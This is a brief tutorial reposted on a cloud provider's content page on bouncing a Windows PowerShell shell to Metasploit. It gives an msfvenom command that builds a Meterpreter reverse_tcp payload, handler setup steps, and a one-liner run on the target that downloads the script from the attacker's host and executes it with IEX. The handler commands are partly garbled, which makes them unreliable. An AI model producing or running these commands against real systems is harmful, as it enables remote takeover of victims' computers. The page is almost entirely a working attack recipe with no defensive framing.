Use PowerShell to bounce shells to Metasploit

Source: Internet
Author: User

First, use Msfvenom to generate PS1 files:

Msfvenom-p windows/x64/meterpreter/reverse_tcp lhost=192.168. 217.162 lport=7788 -F psh-reflection >7788. PS1

Second, open MSF monitoring:

 use exploit/multi/> Set payload windows/x64/meterpreter/= windows/meterpreter/  > Set lhost xxx.xxx.xxx.  = = xxx.xxx.xxx.  >=> Run

Second, execute the CMD command on the target machine:

" IEX (New-object net.webclient). Downloadstring (' Http://192.168.217.162/7788.ps1 '); Xx.ps1"

Note whether the target and system are 32-bit or 64-bit.

Use PowerShell to bounce shells to Metasploit

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.